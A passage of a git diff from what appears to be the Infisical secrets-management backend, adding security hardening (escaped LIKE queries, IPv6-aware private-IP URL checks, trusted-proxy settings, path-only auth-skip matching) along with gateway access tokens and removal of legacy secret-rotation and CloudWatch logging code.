queryBuilder.whereILike(filterAst.field, `%${filterAst.value}`); + void queryBuilder.whereILike(filterAst.field, `%${sanitizeSqlLikeString(filterAst.value)}`); break; } case "notIn": { diff --git a/backend/src/lib/knex/index.ts b/backend/src/lib/knex/index.ts index 230d5cb3920..123931fec1b 100644 --- a/backend/src/lib/knex/index.ts +++ b/backend/src/lib/knex/index.ts @@ -5,6 +5,7 @@ import { Tables } from "knex/types/tables"; import { TableName } from "@app/db/schemas"; import { DatabaseError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; import { buildDynamicKnexQuery, TKnexDynamicOperator } from "./dynamic"; export * from "./connection"; @@ -70,7 +71,7 @@ export const buildFindFilter = if ($search) { Object.entries($search).forEach(([key, val]) => { if (val) { - void bd.whereILike(`${tableName ? `${tableName}.` : ""}${key}`, val as never); + void bd.whereILike(`${tableName ? `${tableName}.` : ""}${key}`, `%${sanitizeSqlLikeString(val as string)}%`); } }); } @@ -108,7 +109,7 @@ export type TOrmify = { findById: (id: string, tx?: Knex) => Promise; find: ( filter: TFindFilter, - { offset, limit, sort, count, tx, countDistinct }?: TFindOpt + opts?: TFindOpt ) => Promise>; findOne: (filter: Partial, tx?: Knex) => Promise; create: (data: Tables[Tname]["insert"], tx?: Knex) => Promise; diff --git a/backend/src/lib/knex/scim.ts b/backend/src/lib/knex/scim.ts index d522e2f5f9c..3758ed984b0 100644 --- a/backend/src/lib/knex/scim.ts +++ b/backend/src/lib/knex/scim.ts @@ -3,6 +3,9 @@ import { Compare, Filter, parse } from "scim2-parse-filter"; import { TableName } from "@app/db/schemas"; +import { BadRequestError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; + const appendParentToGroupingOperator = (parentPath: string, filter: Filter) => { if (filter.op !== "[]" && filter.op !== "and" && filter.op !== "or" && filter.op !== "not") { return { ...filter, attrPath: `${parentPath}.${(filter as Compare).attrPath}` }; @@ -64,7 +67,10 @@ const processDynamicQuery = ( } case "sw": { const attrPath = getAttributeField(scimFilterAst.attrPath); - if (attrPath) void query.whereILike(attrPath, `${scimFilterAst.compValue}%`); + if (!scimFilterAst.compValue || !attrPath) { + throw new BadRequestError({ message: "compValue is required for sw filter" }); + } + void query.whereILike(attrPath, `${sanitizeSqlLikeString(String(scimFilterAst.compValue))}%`); break; } case "ew": { @@ -73,7 +79,8 @@ const processDynamicQuery = ( if (attrPath === `${TableName.Users}.email` && typeof sanitizedValue === "string") { sanitizedValue = sanitizedValue.toLowerCase(); } - if (attrPath) void query.whereILike(attrPath, `%${sanitizedValue}`); + if (attrPath && sanitizedValue) + void query.whereILike(attrPath, `%${sanitizeSqlLikeString(String(sanitizedValue))}`); break; } case "co": { @@ -82,7 +89,8 @@ const processDynamicQuery = ( if (attrPath === `${TableName.Users}.email` && typeof sanitizedValue === "string") { sanitizedValue = sanitizedValue.toLowerCase(); } - if (attrPath) void query.whereILike(attrPath, `%${sanitizedValue}%`); + if (attrPath && sanitizedValue) + void query.whereILike(attrPath, `%${sanitizeSqlLikeString(String(sanitizedValue))}%`); break; } case "ne": { diff --git a/backend/src/lib/logger/logger.ts b/backend/src/lib/logger/logger.ts index 591bc06556e..bf446835c0c 100644 --- a/backend/src/lib/logger/logger.ts +++ b/backend/src/lib/logger/logger.ts @@ -4,7 +4,6 @@ // easier to use it that's all. import { requestContext } from "@fastify/request-context"; import pino, { Logger } from "pino"; -import { z } from "zod"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; @@ -48,15 +47,6 @@ export interface CustomLogger extends Omit; -const loggerConfig = z.object({ - AWS_CLOUDWATCH_LOG_GROUP_NAME: z.string().default("infisical-log-stream"), - AWS_CLOUDWATCH_LOG_REGION: z.string().default("us-east-1"), - AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID: z.string().min(1).optional(), - AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET: z.string().min(1).optional(), - AWS_CLOUDWATCH_LOG_INTERVAL: z.coerce.number().default(1000), - NODE_ENV: z.enum(["development", "test", "production"]).default("production") -}); - const redactedKeys = [ "accessToken", "authToken", @@ -81,6 +71,9 @@ const redactedKeys = [ "encryptedKey", "plaintextProjectKey", "accessKey", + "accessKeyId", + "secretAccessKey", + "sessionToken", "botKey", "decryptedSecret", "secrets", @@ -114,7 +107,6 @@ const extractOrgId = () => { }; export const initLogger = () => { - const cfg = loggerConfig.parse(process.env); const targets: pino.TransportMultiOptions["targets"][number][] = [ { level: "info", @@ -126,21 +118,6 @@ export const initLogger = () => { } ]; - if (cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID && cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET) { - targets.push({ - target: "@serdnam/pino-cloudwatch-transport", - level: "info", - options: { - logGroupName: cfg.AWS_CLOUDWATCH_LOG_GROUP_NAME, - logStreamName: cfg.AWS_CLOUDWATCH_LOG_GROUP_NAME, - awsRegion: cfg.AWS_CLOUDWATCH_LOG_REGION, - awsAccessKeyId: cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID, - awsSecretAccessKey: cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET, - interval: cfg.AWS_CLOUDWATCH_LOG_INTERVAL - } - }); - } - const transport = pino.transport({ targets }); diff --git a/backend/src/lib/request-context/memo-keys.ts b/backend/src/lib/request-context/memo-keys.ts index 8f6a1300645..17e3680ab3f 100644 --- a/backend/src/lib/request-context/memo-keys.ts +++ b/backend/src/lib/request-context/memo-keys.ts @@ -41,5 +41,9 @@ export const requestMemoKeys = { userFindById: (userId: string) => `user:findById:${userId}`, - identityFindById: (identityId: string) => `identity:findById:${identityId}` + identityFindById: (identityId: string) => `identity:findById:${identityId}`, + + orgFindById: (orgId: string) => `org:findById:${orgId}`, + + orgFindOrgById: (orgId: string) => `org:findOrgById:${orgId}` }; diff --git a/backend/src/lib/search-resource/db.ts b/backend/src/lib/search-resource/db.ts index fc450d9f918..51c0e82c4f5 100644 --- a/backend/src/lib/search-resource/db.ts +++ b/backend/src/lib/search-resource/db.ts @@ -1,5 +1,6 @@ import { Knex } from "knex"; +import { sanitizeSqlLikeString } from "../fn"; import { SearchResourceOperators, TSearchResourceOperator } from "./search"; const buildKnexQuery = ( @@ -65,15 +66,15 @@ const buildKnexQuery = ( if (typeof value !== "string") throw new Error("Invalid value type for $contains operator"); if (typeof fields === "string") { - return void query.whereILike(fields, `%${value}%`); + return void query.whereILike(fields, `%${sanitizeSqlLikeString(value)}%`); } return void query.where((qb) => { return fields.forEach((el, index) => { if (index === 0) { - return void qb.whereILike(el, `%${value}%`); + return void qb.whereILike(el, `%${sanitizeSqlLikeString(value)}%`); } - return void qb.orWhereILike(el, `%${value}%`); + return void qb.orWhereILike(el, `%${sanitizeSqlLikeString(value)}%`); }); }); } diff --git a/backend/src/lib/validator/validate-url.ts b/backend/src/lib/validator/validate-url.ts index b96d1bfe4df..d7127de1d73 100644 --- a/backend/src/lib/validator/validate-url.ts +++ b/backend/src/lib/validator/validate-url.ts @@ -1,6 +1,6 @@ import dns from "node:dns/promises"; -import { isIPv4 } from "net"; +import { isIP } from "net"; import RE2 from "re2"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; @@ -22,28 +22,19 @@ export const blockLocalAndPrivateIpAddresses = async (url: string, isGateway = f } const inputHostIps: string[] = []; - if (isIPv4(validUrl.hostname)) { + if (isIP(validUrl.hostname)) { inputHostIps.push(validUrl.hostname); } else { if (validUrl.hostname === "localhost" || validUrl.hostname === "host.docker.internal") { throw new BadRequestError({ message: "Local IPs not allowed as URL" }); } - try { - const resolvedIps = await dns.resolve4(validUrl.hostname); - inputHostIps.push(...resolvedIps); - } catch (err) { - if ((err as { code: string })?.code !== "ENOTFOUND") throw err; + const entries = await dns.lookup(validUrl.hostname, { all: true }); - const entries = await dns.lookup(validUrl.hostname, { all: true, family: 4 }); - - if (!entries || entries.length === 0) { - throw new BadRequestError({ message: "Could not resolve hostname to any IPv4 address" }); - } - - const resolvedIps = entries.map(({ address }) => address); - - inputHostIps.push(...resolvedIps); + if (!entries || entries.length === 0) { + throw new BadRequestError({ message: "Could not resolve hostname to any IP address" }); } + + inputHostIps.push(...entries.map(({ address }) => address)); } const isInternalIp = inputHostIps.some((el) => isPrivateIp(el)); if (isInternalIp && !appCfg.ALLOW_INTERNAL_IP_CONNECTIONS) diff --git a/backend/src/lib/workflow-integrations/trigger-notification.ts b/backend/src/lib/workflow-integrations/trigger-notification.ts index 2dc6f61fe93..4e28ea5b9d9 100644 --- a/backend/src/lib/workflow-integrations/trigger-notification.ts +++ b/backend/src/lib/workflow-integrations/trigger-notification.ts @@ -1,4 +1,6 @@ import { logger } from "../logger"; +import { requestMemoKeys } from "../request-context/memo-keys"; +import { requestMemoize } from "../request-context/request-memoizer"; import { triggerMicrosoftTeamsNotification } from "./notification-handlers/microsoft-teams"; import { triggerSlackNotification } from "./notification-handlers/slack"; import { TTriggerWorkflowNotificationDTO } from "./types"; @@ -9,7 +11,9 @@ export const triggerWorkflowIntegrationNotification = async (dto: TTriggerWorkfl const { projectDAL, projectSlackConfigDAL, kmsService, projectMicrosoftTeamsConfigDAL, microsoftTeamsService } = dto.dependencies; - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { return; diff --git a/backend/src/queue/queue-service.ts b/backend/src/queue/queue-service.ts index 50eb951dcc5..784c41f5dc0 100644 --- a/backend/src/queue/queue-service.ts +++ b/backend/src/queue/queue-service.ts @@ -54,7 +54,6 @@ import { TWebhookPayloads } from "@app/services/webhook/webhook-types"; export const JOB_SCHEDULER_PREFIX = "jsv1"; export enum QueueName { - SecretRotation = "secret-rotation", SecretReminder = "secret-reminder", AuditLog = "audit-log", // TODO(akhilmhdh): This will get removed later. For now this is kept to stop the repeatable queue @@ -105,12 +104,12 @@ export enum QueueName { AuditLogClickHouseBatch = "audit-log-clickhouse-batch", PamDiscoveryScan = "pam-discovery-scan", CaAutoRenewal = "ca-auto-renewal", - CertificateCleanup = "certificate-cleanup" + CertificateCleanup = "certificate-cleanup", + DigiCertOrderPolling = "digicert-order-polling" } export enum QueueJobs { SecretReminder = "secret-reminder-job", - SecretRotation = "secret-rotation-job", AuditLog = "audit-log-job", // TODO(akhilmhdh): This will get removed later. For now this is kept to stop the repeatable queue AuditLogPrune = "audit-log-prune-job", @@ -177,7 +176,8 @@ export enum QueueJobs { CaVenafiInstall = "ca-venafi-install-job", CaAdcsInstall = "ca-adcs-install-job", CertificateCleanup = "certificate-cleanup-job", - DailySecretSyncRetry = "daily-secret-sync-retry-job" + DailySecretSyncRetry = "daily-secret-sync-retry-job", + DigiCertOrderPolling = "digicert-order-polling-job" } export type TQueueOptions = { @@ -211,10 +211,6 @@ export type TQueueJobTypes = { }; name: QueueJobs.SecretReminder; }; - [QueueName.SecretRotation]: { - payload: { rotationId: string }; - name: QueueJobs.SecretRotation; - }; [QueueName.AuditLog]: { name: QueueJobs.AuditLog; payload: TCreateAuditLogDTO; @@ -551,6 +547,10 @@ export type TQueueJobTypes = { name: QueueJobs.CertificateCleanup; payload: undefined; }; + [QueueName.DigiCertOrderPolling]: { + name: QueueJobs.DigiCertOrderPolling; + payload: undefined; + }; }; const SECRET_SCANNING_QUEUES = [ @@ -649,7 +649,7 @@ export const queueServiceFactory = (redisCfg: TRedisConfigKeys): TQueueServiceFa // Remove orphaned job schedulers left in Redis by the QueueInternalRecovery/QueueInternalReconciliation deleted queues. void (async () => { - const staleQueueNames = ["queue-internal-recovery", "queue-internal-reconciliation"]; + const staleQueueNames = ["queue-internal-recovery", "queue-internal-reconciliation", "secret-rotation"]; await Promise.allSettled( staleQueueNames.map(async (name) => { const staleQueue = new Queue(name, { diff --git a/backend/src/server/app.ts b/backend/src/server/app.ts index 53095cefcfd..6ff780af65d 100644 --- a/backend/src/server/app.ts +++ b/backend/src/server/app.ts @@ -75,7 +75,9 @@ export const main = async ({ const server = fastify({ logger: appCfg.NODE_ENV === "test" ? false : logger, genReqId: () => `req-${alphaNumericNanoId(14)}`, - trustProxy: true, + // When TRUSTED_PROXY_CIDRS is configured, only requests from those sources have their + // forwarded-IP headers honored. Unset preserves legacy behavior (trust all) for backcompat. + trustProxy: appCfg.TRUSTED_PROXY_CIDRS ?? true, connectionTimeout: 100_000, ignoreTrailingSlash: true, diff --git a/backend/src/server/plugins/audit-log.ts b/backend/src/server/plugins/audit-log.ts index d0198e7bf0a..725f8b5ca5f 100644 --- a/backend/src/server/plugins/audit-log.ts +++ b/backend/src/server/plugins/audit-log.ts @@ -50,10 +50,12 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { req.auditLogInfo = payload; return; } + if (req.auth.actor === ActorType.USER) { payload.actor = { type: ActorType.USER, metadata: { + ...(req.auth.authMethod ? { authMethod: req.auth.authMethod } : {}), email: req.auth.user.email, username: req.auth.user.username, userId: req.permission.id @@ -75,6 +77,7 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { metadata: { name: req.auth.identityName, identityId: req.auth.identityId, + ...(identityAuthInfo?.authMethod ? { authMethod: identityAuthInfo.authMethod } : {}), ...(identityAuthInfo?.aws ? { aws: identityAuthInfo.aws } : {}), ...(identityAuthInfo?.kubernetes ? { kubernetes: identityAuthInfo.kubernetes } : {}), ...(identityAuthInfo?.oidc ? { oidc: identityAuthInfo.oidc } : {}) @@ -85,6 +88,13 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { type: ActorType.SCIM_CLIENT, metadata: {} }; + } else if (req.auth.actor === ActorType.GATEWAY) { + payload.actor = { + type: ActorType.GATEWAY, + metadata: { + gatewayId: req.permission.id + } + }; } else { throw new BadRequestError({ message: "Invalid actor type provided" }); } diff --git a/backend/src/server/plugins/auth/inject-assume-privilege.ts b/backend/src/server/plugins/auth/inject-assume-privilege.ts index 46c6ea8e3c0..f22d2ab5643 100644 --- a/backend/src/server/plugins/auth/inject-assume-privilege.ts +++ b/backend/src/server/plugins/auth/inject-assume-privilege.ts @@ -9,9 +9,11 @@ export const injectAssumePrivilege = fp(async (server: FastifyZodProvider) => { const assumeRoleCookie = req.cookies["infisical-project-assume-privileges"]; try { if (req?.auth?.authMode === AuthMode.JWT && assumeRoleCookie) { - const decodedToken = server.services.assumePrivileges.verifyAssumePrivilegeToken( + const decodedToken = await server.services.assumePrivileges.verifyAssumePrivilegeToken( assumeRoleCookie, - req.auth.tokenVersionId + req.auth.tokenVersionId, + req.auth.authMethod, + req.auth.orgId ); if (decodedToken) { requestContext.set(RequestContextKey.AssumedPrivilegeDetails, decodedToken); diff --git a/backend/src/server/plugins/auth/inject-identity.ts b/backend/src/server/plugins/auth/inject-identity.ts index 857f9418136..378a23ea181 100644 --- a/backend/src/server/plugins/auth/inject-identity.ts +++ b/backend/src/server/plugins/auth/inject-identity.ts @@ -7,7 +7,7 @@ import { TServiceTokens, TUsers } from "@app/db/schemas"; import { TScimTokenJwtPayload } from "@app/ee/services/scim/scim-types"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto"; -import { BadRequestError } from "@app/lib/errors"; +import { BadRequestError, UnauthorizedError } from "@app/lib/errors"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; import { ActorType, @@ -15,7 +15,8 @@ import { AuthMode, AuthModeJwtTokenPayload, AuthTokenType, - MfaMethod + MfaMethod, + TGatewayAccessTokenJwtPayload } from "@app/services/auth/auth-type"; import { TIdentityAccessTokenJwtPayload } from "@app/services/identity-access-token/identity-access-token-types"; import { getServerCfg } from "@app/services/super-admin/super-admin-service"; @@ -77,6 +78,16 @@ export type TAuthMode = rootOrgId: string; parentOrgId: string; authMethod: null; + } + | { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN; + actor: ActorType.GATEWAY; + gatewayId: string; + orgId: string; + rootOrgId: string; + parentOrgId: string; + authMethod: null; + token: TGatewayAccessTokenJwtPayload; }; export const extractAuth = async (req: FastifyRequest, jwtSecret: string) => { @@ -129,6 +140,12 @@ export const extractAuth = async (req: FastifyRequest, jwtSecret: string) => { token: decodedToken as TScimTokenJwtPayload, actor: ActorType.SCIM_CLIENT } as const; + case AuthTokenType.GATEWAY_ACCESS_TOKEN: + return { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN, + token: decodedToken as TGatewayAccessTokenJwtPayload, + actor: ActorType.GATEWAY + } as const; default: return { authMode: null, token: null } as const; } @@ -159,30 +176,42 @@ export const injectIdentity = fp( return; } + // Match against the pathname only β€” req.url includes the query string, which a + // client can use to smuggle matching substrings and skip auth injection. + const pathname = req.url.split("?", 1)[0]; + if ( - req.url.includes(".well-known/est") || - req.url.includes("/scep/") || - (req.url.includes("/api/v3/auth/") && !req.url.includes("/api/v3/auth/select-organization")) + pathname.startsWith("/.well-known/est") || + (pathname.startsWith("/api/v3/auth/") && !pathname.startsWith("/api/v3/auth/select-organization")) ) { return; } - if (req.url === "/api/v1/ai/mcp/servers/oauth/callback") { + if (pathname.includes("/scep/") && pathname.includes("pkiclient.exe")) { + return; + } + + if (pathname === "/api/v1/ai/mcp/servers/oauth/callback") { return; } // Authentication is handled on a route-level - if (req.url === "/api/v1/relays/register-instance-relay") { + if (pathname === "/api/v1/relays/register-instance-relay") { + return; + } + + // Authentication is handled on a route-level (enrollment token in body) + if (pathname === "/api/v3/gateways/token-auth/enroll") { return; } // Authentication is handled on a route-level - if (req.url === "/api/v1/relays/heartbeat-instance-relay") { + if (pathname === "/api/v1/relays/heartbeat-instance-relay") { return; } // Authentication is handled on a route-level here. - if (req.url.includes("/api/v1/workflow-integrations/microsoft-teams/message-endpoint")) { + if (pathname.startsWith("/api/v1/workflow-integrations/microsoft-teams/message-endpoint")) { return; } @@ -321,6 +350,27 @@ export const injectIdentity = fp( }; break; } + case AuthMode.GATEWAY_ACCESS_TOKEN: { + const gateway = await server.services.gatewayV2.getGatewayById({ gatewayId: token.gatewayId }); + + if (gateway.tokenVersion !== token.tokenVersion) { + throw new UnauthorizedError({ message: "Gateway token has been revoked" }); + } + + requestContext.set(RequestContextKey.OrgId, token.orgId); + + req.auth = { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN, + actor, + gatewayId: token.gatewayId, + orgId: token.orgId, + rootOrgId: token.orgId, + parentOrgId: token.orgId, + authMethod: null, + token + }; + break; + } default: throw new BadRequestError({ message: "Invalid token strategy provided" }); } diff --git a/backend/src/server/plugins/auth/inject-permission.ts b/backend/src/server/plugins/auth/inject-permission.ts index 827a055d3cb..b19f7cd97ab 100644 --- a/backend/src/server/plugins/auth/inject-permission.ts +++ b/backend/src/server/plugins/auth/inject-permission.ts @@ -61,6 +61,19 @@ export const injectPermission = fp(async (server) => { logger.info( `injectPermission: Injecting permissions for [permissionsForIdentity=${req.auth.scimTokenId}] [type=${ActorType.SCIM_CLIENT}]` ); + } else if (req.auth.actor === ActorType.GATEWAY) { + req.permission = { + type: ActorType.GATEWAY, + id: req.auth.gatewayId, + orgId: req.auth.orgId, + rootOrgId: req.auth.rootOrgId, + parentOrgId: req.auth.parentOrgId, + authMethod: null + }; + + logger.info( + `injectPermission: Injecting permissions for [permissionsForGateway=${req.auth.gatewayId}] [type=${ActorType.GATEWAY}]` + ); } }); }); diff --git a/backend/src/server/plugins/ip.ts b/backend/src/server/plugins/ip.ts index 7b5838d57b1..4096bb8eb9c 100644 --- a/backend/src/server/plugins/ip.ts +++ b/backend/src/server/plugins/ip.ts @@ -1,5 +1,7 @@ import fp from "fastify-plugin"; +import { getConfig } from "@app/lib/config/env"; + /*! https://github.com/pbojinov/request-ip/blob/9501cdf6e73059cc70fc6890adb086348d7cca46/src/index.js. MIT License. 2022 Petar Bojinov - petarbojinov+github@gmail.com */ const headersOrder = [ @@ -20,7 +22,18 @@ const headersOrder = [ export const fastifyIp = fp(async (fastify) => { fastify.decorateRequest("realIp", null); + const { TRUSTED_PROXY_CIDRS } = getConfig(); fastify.addHook("onRequest", async (req) => { + // Strict mode: TRUSTED_PROXY_CIDRS configured β†’ delegate to Fastify's proxy-addr-backed + // req.ip, which validates the socket source against the trusted CIDR list and parses + // X-Forwarded-For right-to-left, discarding attacker-supplied values. + if (TRUSTED_PROXY_CIDRS) { + req.realIp = req.ip; + return; + } + + // Legacy mode: first-matching-header wins. Preserved for backwards compatibility + // with self-hosted deployments that haven't configured a trusted proxy list. const forwardedIpHeader = headersOrder.find((header) => Boolean(req.headers[header])); const forwardedIp = forwardedIpHeader ? req.headers[forwardedIpHeader] : undefined; if (forwardedIp) { diff --git a/backend/src/server/routes/index.ts b/backend/src/server/routes/index.ts index 00abff4c158..053908a5c16 100644 --- a/backend/src/server/routes/index.ts +++ b/backend/src/server/routes/index.ts @@ -14,6 +14,7 @@ import { registerCertificateEstRouter } from "@app/ee/routes/est/certificate-est import { registerPkiScepRouter } from "@app/ee/routes/scep/pki-scep-router"; import { registerV1EERoutes } from "@app/ee/routes/v1"; import { registerV2EERoutes } from "@app/ee/routes/v2"; +import { registerV3EERoutes } from "@app/ee/routes/v3"; import { accessApprovalPolicyApproverDALFactory, accessApprovalPolicyBypasserDALFactory @@ -58,6 +59,10 @@ import { externalKmsServiceFactory } from "@app/ee/services/external-kms/externa import { gatewayDALFactory } from "@app/ee/services/gateway/gateway-dal"; import { gatewayServiceFactory } from "@app/ee/services/gateway/gateway-service"; import { orgGatewayConfigDALFactory } from "@app/ee/services/gateway/org-gateway-config-dal"; +import { gatewayPoolDalFactory } from "@app/ee/services/gateway-pool/gateway-pool-dal"; +import { gatewayPoolMembershipDalFactory } from "@app/ee/services/gateway-pool/gateway-pool-membership-dal"; +import { gatewayPoolServiceFactory } from "@app/ee/services/gateway-pool/gateway-pool-service"; +import { gatewayEnrollmentTokenDALFactory } from "@app/ee/services/gateway-v2/gateway-enrollment-token-dal"; import { gatewayV2DalFactory } from "@app/ee/services/gateway-v2/gateway-v2-dal"; import { gatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { orgGatewayConfigV2DalFactory } from "@app/ee/services/gateway-v2/org-gateway-config-v2-dal"; @@ -71,6 +76,7 @@ import { isHsmActiveAndEnabled } from "@app/ee/services/hsm/hsm-fns"; import { THsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { identityAuthTemplateDALFactory } from "@app/ee/services/identity-auth-template/identity-auth-template-dal"; import { identityAuthTemplateServiceFactory } from "@app/ee/services/identity-auth-template/identity-auth-template-service"; +import { insightsServiceFactory } from "@app/ee/services/insights/insights-service"; import { kmipClientCertificateDALFactory } from "@app/ee/services/kmip/kmip-client-certificate-dal"; import { kmipClientDALFactory } from "@app/ee/services/kmip/kmip-client-dal"; import { kmipOperationServiceFactory } from "@app/ee/services/kmip/kmip-operation-service"; @@ -96,6 +102,8 @@ import { pamDiscoverySourceDependenciesDALFactory } from "@app/ee/services/pam-d import { pamDiscoverySourceResourcesDALFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-resources-dal"; import { pamDiscoveryRunDALFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-run-dal"; import { pamDiscoverySourceServiceFactory } from "@app/ee/services/pam-discovery/pam-discovery-source-service"; +import { pamDomainDALFactory } from "@app/ee/services/pam-domain/pam-domain-dal"; +import { pamDomainServiceFactory } from "@app/ee/services/pam-domain/pam-domain-service"; import { pamFolderDALFactory } from "@app/ee/services/pam-folder/pam-folder-dal"; import { pamFolderServiceFactory } from "@app/ee/services/pam-folder/pam-folder-service"; import { pamResourceDALFactory } from "@app/ee/services/pam-resource/pam-resource-dal"; @@ -127,6 +135,7 @@ import { pkiDiscoveryQueueFactory } from "@app/ee/services/pki-discovery/pki-dis import { pkiDiscoveryScanHistoryDALFactory } from "@app/ee/services/pki-discovery/pki-discovery-scan-history-dal"; import { pkiDiscoveryServiceFactory } from "@app/ee/services/pki-discovery/pki-discovery-service"; import { pkiInstallationServiceFactory } from "@app/ee/services/pki-discovery/pki-installation-service"; +import { scepDynamicChallengeDALFactory } from "@app/ee/services/pki-scep/pki-scep-dynamic-challenge-dal"; import { pkiScepServiceFactory } from "@app/ee/services/pki-scep/pki-scep-service"; import { scepTransactionDALFactory } from "@app/ee/services/pki-scep/pki-scep-transaction-dal"; import { projectEventsServiceFactory } from "@app/ee/services/project-events/project-events-service"; @@ -159,9 +168,6 @@ import { secretApprovalRequestReviewerDALFactory } from "@app/ee/services/secret import { secretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal"; import { secretApprovalRequestServiceFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-service"; import { secretReplicationServiceFactory } from "@app/ee/services/secret-replication/secret-replication-service"; -import { secretRotationDALFactory } from "@app/ee/services/secret-rotation/secret-rotation-dal"; -import { secretRotationQueueFactory } from "@app/ee/services/secret-rotation/secret-rotation-queue"; -import { secretRotationServiceFactory } from "@app/ee/services/secret-rotation/secret-rotation-service"; import { secretRotationV2DALFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-dal"; import { secretRotationV2QueueServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-queue"; import { secretRotationV2ServiceFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-service"; @@ -208,8 +214,6 @@ import { accessTokenQueueServiceFactory } from "@app/services/access-token-queue import { accountRecoveryServiceFactory } from "@app/services/account-recovery/account-recovery-service"; import { additionalPrivilegeDALFactory } from "@app/services/additional-privilege/additional-privilege-dal"; import { additionalPrivilegeServiceFactory } from "@app/services/additional-privilege/additional-privilege-service"; -import { apiKeyDALFactory } from "@app/services/api-key/api-key-dal"; -import { apiKeyServiceFactory } from "@app/services/api-key/api-key-service"; import { appConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; import { appConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; import { @@ -249,6 +253,8 @@ import { certificateAuthorityQueueFactory } from "@app/services/certificate-auth import { certificateAuthoritySecretDALFactory } from "@app/services/certificate-authority/certificate-authority-secret-dal"; import { certificateAuthorityServiceFactory } from "@app/services/certificate-authority/certificate-authority-service"; import { certificateIssuanceQueueFactory } from "@app/services/certificate-authority/certificate-issuance-queue"; +import { DigiCertCertificateAuthorityFns } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-fns"; +import { digicertCertificateAuthorityQueueServiceFactory } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-queue"; import { externalCertificateAuthorityDALFactory } from "@app/services/certificate-authority/external-certificate-authority-dal"; import { internalCertificateAuthorityDALFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-dal"; import { InternalCertificateAuthorityFns } from "@app/services/certificate-authority/internal/internal-certificate-authority-fns"; @@ -257,6 +263,8 @@ import { certificateCleanupConfigDALFactory } from "@app/services/certificate-cl import { certificateCleanupQueueFactory } from "@app/services/certificate-cleanup/certificate-cleanup-queue"; import { certificateCleanupServiceFactory } from "@app/services/certificate-cleanup/certificate-cleanup-service"; import { certificateEstV3ServiceFactory } from "@app/services/certificate-est-v3/certificate-est-v3-service"; +import { certificateInventoryViewDALFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-dal"; +import { certificateInventoryViewServiceFactory } from "@app/services/certificate-inventory-view/certificate-inventory-view-service"; import { certificatePolicyDALFactory } from "@app/services/certificate-policy/certificate-policy-dal"; import { certificatePolicyServiceFactory } from "@app/services/certificate-policy/certificate-policy-service"; import { certificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; @@ -278,9 +286,9 @@ import { estEnrollmentConfigDALFactory } from "@app/services/enrollment-config/e import { scepEnrollmentConfigDALFactory } from "@app/services/enrollment-config/scep-enrollment-config-dal"; import { externalGroupOrgRoleMappingDALFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-dal"; import { externalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service"; +import { externalMigrationConfigDALFactory } from "@app/services/external-migration/external-migration-config-dal"; import { externalMigrationQueueFactory } from "@app/services/external-migration/external-migration-queue"; import { externalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service"; -import { vaultExternalMigrationConfigDALFactory } from "@app/services/external-migration/vault-external-migration-config-dal"; import { folderCheckpointDALFactory } from "@app/services/folder-checkpoint/folder-checkpoint-dal"; import { folderCheckpointResourcesDALFactory } from "@app/services/folder-checkpoint-resources/folder-checkpoint-resources-dal"; import { folderCommitDALFactory } from "@app/services/folder-commit/folder-commit-dal"; @@ -444,7 +452,6 @@ import { telemetryQueueServiceFactory } from "@app/services/telemetry/telemetry- import { telemetryServiceFactory } from "@app/services/telemetry/telemetry-service"; import { totpConfigDALFactory } from "@app/services/totp/totp-config-dal"; import { totpServiceFactory } from "@app/services/totp/totp-service"; -import { upgradePathServiceFactory } from "@app/services/upgrade-path/upgrade-path-service"; import { userDALFactory } from "@app/services/user/user-dal"; import { userServiceFactory } from "@app/services/user/user-service"; import { userAliasDALFactory } from "@app/services/user-alias/user-alias-dal"; @@ -511,7 +518,6 @@ export const registerRoutes = async ( const orgMembershipDAL = orgMembershipDALFactory(db); const incidentContactDAL = incidentContactDALFactory(db); const rateLimitDAL = rateLimitDALFactory(db); - const apiKeyDAL = apiKeyDALFactory(db); const projectDAL = projectDALFactory(db); const projectSshConfigDAL = projectSshConfigDALFactory(db); @@ -599,7 +605,6 @@ export const registerRoutes = async ( const secretApprovalRequestReviewerDAL = secretApprovalRequestReviewerDALFactory(db); const secretApprovalRequestSecretDAL = secretApprovalRequestSecretDALFactory(db); - const secretRotationDAL = secretRotationDALFactory(db); const snapshotDAL = snapshotDALFactory(db); const snapshotSecretDAL = snapshotSecretDALFactory(db); const 